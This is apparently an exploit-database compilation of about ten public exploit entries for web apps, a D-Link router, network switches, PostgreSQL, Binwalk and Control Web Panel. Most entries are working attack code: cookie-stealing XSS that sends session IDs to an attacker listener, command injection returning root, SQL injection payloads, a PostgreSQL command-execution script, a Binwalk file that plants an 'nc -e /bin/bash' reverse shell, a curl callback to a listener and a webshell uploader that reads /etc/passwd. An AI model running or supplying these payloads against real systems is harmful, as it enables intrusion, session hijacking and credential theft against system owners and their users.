ISHACK AI BOT

# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2021-09-17 # Exploit Author: Matteo Conti - https://deltaspike.io # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Ubuntu 18.04 - LAMP # Description The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message, maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it. # Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message) # Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie> # Prof of concept: - From /contact.php, send a message containing the following payload in "title" or "message" fields: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie> (the first url have to be an existing image) - Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php - Your listener will receive the PHP session id.

## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS) ## Development: nu11secur1ty ## Date: 01.29.2023 ## Vendor: https://zippy.com.ua/ ## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4 ## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4 ## Description: The value of manual insertion `point 1` is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response. ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2 Host: store.zippy.com.ua Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` [+] Response: ``` HTTP/2 200 OK Server: nginx Date: Sun, 29 Jan 2023 07:27:55 GMT Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546 Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br> ``` ## Proof and Exploit: [href](https://streamable.com/aadj5c) ## Reference: [href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA # Date: 30/01/2023 # Exploit Author: Françoa Taffarel # Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Version: DIR846enFW100A53DBR-Retail # Tested on: D-LINK DIR-846 # CVE : CVE-2022-46552 D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request. ### Malicious POST Request ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings" HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285 Content-Length: 171 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775 Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4 {"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}} ``` ### Response ``` HTTP/1.1 200 OK X-Powered-By: PHP/7.1.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-type: text/html; charset=UTF-8 Connection: close Date: Thu, 01 Dec 2022 11:03:54 GMT Server: lighttpd/1.4.35 Content-Length: 68 {"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}} ``` ### Data from RCE Request ``` GET /HNAP1/rce_confirmed HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1 Upgrade-Insecure-Requests: 1 ``` ### Response ``` HTTP/1.1 200 OK Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 24 Connection: close Date: Thu, 01 Dec 2022 23:24:28 GMT Server: lighttpd/1.4.35 uid=0(root) gid=0(root) ```

## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) ## Author: nu11secur1ty ## Date: 01.31.2023 ## Vendor: https://bgerp.com/Bg/Za-sistemata ## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31 ## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based ## Description: The bgERP system suffers from unsecured login cookies in which cookies are stored as very sensitive login and also login session information! The attacker can trick the already login user and can steal the already generated cookie from the system and can do VERY DANGEROUS things with the already stored sensitive information. This can be very expensive for all companies which are using this system, please be careful! Also, this system has a vulnerable search parameter for XSS-Reflected attacks! ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 HTTP/1.1 Host: 192.168.100.77:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.100.77:8080/Portal/Show Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0 Connection: close Content-Length: 0 ``` [+] Response after logout of the system: ```HTTP HTTP/1.1 302 Found Date: Tue, 31 Jan 2023 15:13:26 GMT Server: Apache/2.4.41 (Ubuntu) Expires: 0 Cache-Control: no-cache, must-revalidate Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472 Connection: close Content-Length: 2 Content-Encoding: none Content-Type: text/html; charset=UTF-8 OK ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected) ## Proof and Exploit: [href](https://streamable.com/xhffdu) ## Time spent `01:30:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions # Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/ # Date: 2021/05 # Exploit Author: fu2x2000 # Version: Liferay Portal 6.2.5 or later # CVE : CVE-2021-33990 import requests import json print (" Search this on Google #Dork for liferay -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/") url ="URL Goes Here /html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html" req = requests.get(url) print req sta = req.status_code if sta == 200: print ('Life Vulnerability exists') cook = url print cook inject = "Command=FileUpload&Type=File&CurrentFolder=/" #cook_inject = cook+inject #print cook_inject else: print ('not found try a another method') print ("solution restrict access and user groups")

# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) # Date: 2023-01-02 # Exploit Author: Muhammad Navaid Zafar Ansari # Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip # Version: 1.0 # Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian) # CVE: Not Assigned Yet # References: - ------------------------------------------------------------------------------------ 1. Description: ---------------------- Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql SQLMap Response: [*] starting @ 04:49:58 /2023-02-01/ [04:49:58] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK --- [04:50:00] [INFO] testing MySQL [04:50:00] [INFO] confirming MySQL [04:50:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.55, PHP back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) 3. Example payload: ---------------------- (boolean-based) ' AND 1=1 AND 'test'='test 4. Burpsuite request: ---------------------- GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip Connection: close

# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure # DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability> https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle import requests import re import hashlib import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning if len(sys.argv) < 3: print("Usage: python cve-2019-15993.py URL passwordfile") sys.exit() url = sys.argv[1] file = sys.argv[2] requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def hash_value(value): """Calculate the SHA1 hash of a value.""" sha1 = hashlib.sha1() sha1.update(value.encode('utf-8')) return sha1.hexdigest() def userName_parser(text, start_delimiter, end_delimiter): results = [] iteration = 0 start = 0 while start >= 0: start = text.find(start_delimiter, start) if start >= 0: start += len(start_delimiter) end = text.find(end_delimiter, start) if end >= 0: results.append(text[start:end]) start = end + len(end_delimiter) iteration = iteration + 1 return results # retrieve the web page response = requests.get(url, allow_redirects=False, verify=False) # Read in the values from the file with open(file, 'r') as f: values = f.readlines() values = [value.strip() for value in values] hashes = {hash_value(value): value for value in values} if response.status_code == 302: print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n") url = response.headers["Location"] + "config/device/adminusersetting" response=requests.get(url, verify=False) if response.status_code == 200: print("[*] Successful request to URL:", url + "\n") content = response.text users_names = userName_parser(content,"<userName>","</userName>") sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content) print("SHA1 Hashes found:\n") loops = 0 while loops < len(sha1_hashes): print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n") for sha1_hash in sha1_hashes: if sha1_hash in hashes: print("Match:", sha1_hash, hashes[sha1_hash]) print("\nTesting Credentials via API.\n\n") payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash]) response_login = requests.get(payload, allow_redirects=False, verify=False) headers = response_login.headers if "sessionID" in headers: print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n") print(headers["sessionID"]) else: print("Unable to sign in.") loops = loops + 1 else: print("Host is not vulnerable:", response.status_code) [cid:2b37ad37-9b26-416d-b485-c88954c0ab53] Ken Pyle M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+ Main: 267-540-3337 Direct: 484-498-8340 Email: [email protected] Website: www.cybir.com

# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) # Date: 2023-02-01 # Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon # Github: https://github.com/paulotrindadec/CVE-2019-9193 # Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu # Tested on: Red Hat Enterprise Linux Server 7.9 # CVE: CVE-2019–9193 #!/usr/bin/python3 import sys import psycopg2 import argparse def parseArgs(): parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution') parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]') parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the the PostgreSQL DB [Default: postgres]') parser.add_argument('-c', '--command', nargs='?', help='System command to run') args = parser.parse_args() return args def main(): try: # Variables RHOST = args.ip RPORT = args.port USER = args.user PASS = args.password print(f"\r\n[+] Connect to PostgreSQL - {RHOST}") con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS) if (args.command): exploit(con) else: print ("[!] Add argument -c [COMMAND] to execute system commands") except psycopg2.OperationalError as e: print("Error") print ("\r\n[-] Failed to connect with PostgreSQL") exit() def exploit(con): cur = con.cursor() CMD = args.command try: print('[*] Running\n') cur.execute("DROP TABLE IF EXISTS triggeroffsec;") cur.execute("DROP FUNCTION triggeroffsecexeccmd() cascade;") cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;") cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd on triggeroffsecsource;") cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);") cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd() RETURNS TRIGGER LANGUAGE plpgsql AS $BODY$ BEGIN COPY triggeroffsec (cmdout) FROM PROGRAM %s; RETURN NULL; END; $BODY$; """,[CMD,] ) cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);") cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd AFTER INSERT ON triggeroffsecsource FOR EACH STATEMENT EXECUTE PROCEDURE triggeroffsecexeccmd(); """) cur.execute("INSERT INTO triggeroffsecsource VALUES (2);") cur.execute("TABLE triggeroffsec;") con.commit() returncmd = cur.fetchall() for result in returncmd: print(result) except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if con is not None: con.close() #print("Closed connection") if __name__ == "__main__": args = parseArgs() main()

# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE) # Exploit Author: Etienne Lacoche # CVE-ID: CVE-2022-4510 import os import inspect import argparse print("") print("################################################") print("------------------CVE-2022-4510----------------") print("################################################") print("--------Binwalk Remote Command Execution--------") print("------Binwalk 2.1.2b through 2.3.2 included-----") print("------------------------------------------------") print("################################################") print("----------Exploit by: Etienne Lacoche-----------") print("---------Contact Twitter: @electr0sm0g----------") print("------------------Discovered by:----------------") print("---------Q. Kaiser, ONEKEY Research Lab---------") print("---------Exploit tested on debian 11------------") print("################################################") print("") parser = argparse.ArgumentParser() parser.add_argument("file", help="Path to input .png file",default=1) parser.add_argument("ip", help="Ip to nc listener",default=1) parser.add_argument("port", help="Port to nc listener",default=1) args = parser.parse_args() if args.file and args.ip and args.port: header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e") lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n'] in_file = open(args.file, "rb") data = in_file.read() in_file.close() with open("/tmp/plugin", "w") as f: for line in lines: f.write(line) with open("/tmp/plugin", "rb") as f: content = f.read() os.system("rm /tmp/plugin") with open("binwalk_exploit.png", "wb") as f: f.write(data) f.write(header_pfs) f.write(content) print("") print("You can now rename and share binwalk_exploit and start your local netcat listener.") print("")

// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) // Date: 2023-02-02 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://centos-webpanel.com/ // Affected Versions: version < 0.9.8.1147 // Tested on: Kali Linux // CVE : CVE-2022-44877 // Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7 // Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020 package main import ( "bytes" "crypto/tls" "fmt" "net/http" "flag" "time" ) func main() { var host,call string flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)") flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)") flag.Parse() banner := ` -= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =- - by Mayank Deshmukh (ColdFusionX) ` fmt.Printf(banner) fmt.Println("[*] Triggering cURL command") fmt.Println("[*] Open Listener on " + call + "") //Skip certificate validation tr := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } client := &http.Client{Transport: tr} // Request URL url := host + "/login/index.php?login=$(curl${IFS}" + call + ")" // Request body body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login")) // Create HTTP client and send POST request req, err := http.NewRequest("POST", url, body) req.Header.Add("Content-Type", "application/x-www-form-urlencoded") resp, err := client.Do(req) if err != nil { fmt.Println("Error sending request:", err) return } time.Sleep(2 * time.Second) defer resp.Body.Close() fmt.Println("\n[*] Check Listener for OOB callback") }

# Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE) # Date: 02-Feb-2023 # Exploit Author: Galoget Latorre (@galoget) # Vendor Homepage: https://responsivefilemanager.com # Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip # Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604 # Version: 9.9.5 # Language: Python 3.x # Tested on: # - Ubuntu 22.04.5 LTS 64-bit # - Debian GNU/Linux 10 (buster) 64-bit # - Kali GNU/Linux 2022.3 64-bit # CVE: CVE-2022-46604 (Konstantin Burov) #!/usr/bin/python3 # -*- coding:utf-8 -*- import sys import requests from bs4 import BeautifulSoup from termcolor import colored, cprint # Usage: python3 exploit.py <target.site> # Example: python3 exploit.py 127.0.0.1 def banner(): """ Function to print the banner """ banner_text = """ _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ | | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | | | --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ | |_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_| File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE) Exploit Author: Galoget Latorre (@galoget) CVE Author: Konstantin Burov """ print(banner_text) def usage_instructions(): """ Function that validates the number of arguments. The aplication MUST have 2 arguments: - [0]: Name of the script - [1]: Target site, which can be a domain or an IP Address """ if len(sys.argv) != 2: print("Usage: python3 exploit.py <target.site>") print("Example: python3 exploit.py 127.0.0.1") sys.exit(0) def run_command(web_session, webshell_url, command_to_run): """ Function that: - Interacts with the webshell to run a command - Cleans the response of the webshell - Returns the response object and the output of the command """ webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers) command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser') return (webshell_response, command_output_soup.find('pre').text) if __name__ == "__main__": banner() usage_instructions() # Change this with the domain or IP address to attack if sys.argv[1]: host = sys.argv[1] else: host = "127.0.0.1" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', } # URL to create a new file target_url = f"http://{host}/filemanager/execute.php?action=create_file" # Change this to customize the payload (i.e. The content of the malicious file that will be created) payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>" # oneliner_payload = " <?=`$_GET[_]`?>" # URL to get a PHPSESSID value cookie_url = f"http://{host}/filemanager/dialog.php" # New Session session = requests.Session() # GET request to retrieve a PHPSESSID value cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue") try: session.get(url = cookie_url, headers = headers) except: cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red") sys.exit(0) if session.cookies.get_dict(): cprint("[+] PHPSESSID retrieved correctly.", "green") cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow") else: cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red") # Params, rename if you want params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload} # POST request to create the webshell cprint(f"\n[*] Attempting to create a webshell on {host}", "blue") response = session.post(url = target_url, headers = headers, data = params) # If the status code and the message match, we may have a webshell inside. ;) if response.status_code == 200 and response.text == "File successfully saved.": # Default webshell path shell_url = f"http://{host}/source/shell.php" # Verify if the shell was uploaded by running whoami and cat /etc/passwd webshell, whoami_output = run_command(session, shell_url, "whoami") webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd") # Common users when getting a webshell common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"] # Verify if the command was executed correctly if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output: cprint("[+] Webshell uploaded - Enjoy!", "green") cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow") cprint(f"[+] Running `whoami` command: {whoami_output}", "green") # Ask to enter into a pseudo-interactive mode with the webshell answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta")) if answer.upper() == "Y": cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue") command = "" while command != "exit": command = input(colored(">> ", "cyan")).lower() webshell, command_output = run_command(session, shell_url, command) if command != "exit": cprint(command_output, "cyan") cprint("\n[*] Exiting...Bye!", "blue") elif response.status_code == 403 and response.text == "The file is already existing": cprint("[-] The file that you're trying to create is already on the server.", "red") else: cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red")

